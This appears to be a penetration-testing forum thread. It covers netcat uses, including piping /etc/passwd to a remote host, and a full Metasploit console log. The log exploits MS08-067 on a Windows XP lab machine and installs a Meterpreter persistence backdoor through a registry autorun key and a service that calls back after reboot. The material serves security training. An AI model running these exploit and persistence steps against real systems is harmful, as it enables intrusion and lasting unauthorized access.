I'm sure there's been an admin or two that have tried, but it's really not a good solution. Hopefully they'd at least use socat or cryptcat and have it connect back to their system, not just bind so anyone on the network could access it
There are a lot of legitimate uses for netcat. It's great to do basic network tests (i.e. did the firewall change get implemented correctly?):
# nc -vv google.com 80
Connection to google.com 80 port [tcp/http] succeeded!
I also use it for copying information over the network where I don't want to setup something like file sharing.
destination: # nc -lp 9999 > goodies.txt
source: # cat /etc/passwd | nc 192.168.1.99 9999
Be sure to familiarize yourself with the netcat cheat sheet:
http://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf The port relaying stuff is pretty cool too.
And yes, Meterpreter is preferred to netcat from a pen testing perspective, but it's not always feasible or possible. It's important to know how to get around with a basic shell on both *nix and Windows systems.
I'm not sure why you're not receiving a connection upon a reboot. It works for me:
msf > use exploit/windows/smb/ms08_067_netapi
rhost => 192.168.1.50
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.1.99:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (749056 bytes) to 192.168.1.50
[*] Meterpreter session 1 opened (192.168.1.99:4444 -> 192.168.1.50:1031) at Sun Feb 03 10:49:22 -0700 2013
meterpreter > run persistence -A -S -X -i 5 -p 443 -r 192.168.1.99
[*] Creating a persistent agent: LHOST=192.168.1.99 LPORT=443 (interval=5 onboot=true)
[*] Persistent agent script is 609700 bytes long
[*] Uploaded the persistent agent to C:\WINDOWS\TEMP\efdfhUSKx.vbs
[*] Agent executed with PID 1200
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\YkPXtjqzB
[*] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\YkPXtjqzB
[*] Creating service LendDpizgQ
[*] For cleanup use command: run multi_console_command -rc /root/.msf3/logs/persistence/XXXXXX-AEF856CC_20130203.5054/clean_up__20130203.5054.rc
meterpreter > [*] Meterpreter session 2 opened (192.168.1.99:443 -> 192.168.1.50:1034) at Sun Feb 03 10:51:03 -0700 2013
Background session 1? [y/N]
msf exploit(ms08_067_netapi) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ XXXXXX-AEF856CC 192.168.1.99:4444 -> 192.168.1.50:1031
2 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ XXXXXX-AEF856CC 192.168.1.99:443 -> 192.168.1.50:1034
msf exploit(ms08_067_netapi) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > reboot
Rebooting...
meterpreter > exit
[*] Meterpreter session 2 closed. Reason: User exit
msf exploit(ms08_067_netapi) > [*] Meterpreter session 3 opened (192.168.1.99:443 -> 192.168.1.50:1035) at Sun Feb 03 10:52:04 -0700 2013
msf exploit(ms08_067_netapi) > sessions -K
[*] Killing all sessions...
[*] Meterpreter session 1 closed.
[*] Meterpreter session 3 closed.
msf exploit(ms08_067_netapi) > jobs
Jobs
====
Id Name
-- ----
0 Exploit: multi/handler
msf exploit(ms08_067_netapi) > [*] Meterpreter session 4 opened (192.168.1.99:443 -> 192.168.1.50:1025) at Sun Feb 03 10:52:44 -0700 2013
Make sure you have your listener (multi/handler) setup and waiting for the connection. run persistence will do this for you with -A, but you'll have to configure it manually if you don't use that. Check the output of netstat -anp tcp on your Windows host to start troubleshooting.
Way to actually get your hands dirty and not just memorize trivia for your CEH
OSCP - Offensive Security Certified Professional : Failed my first attempt at the OSCP exam
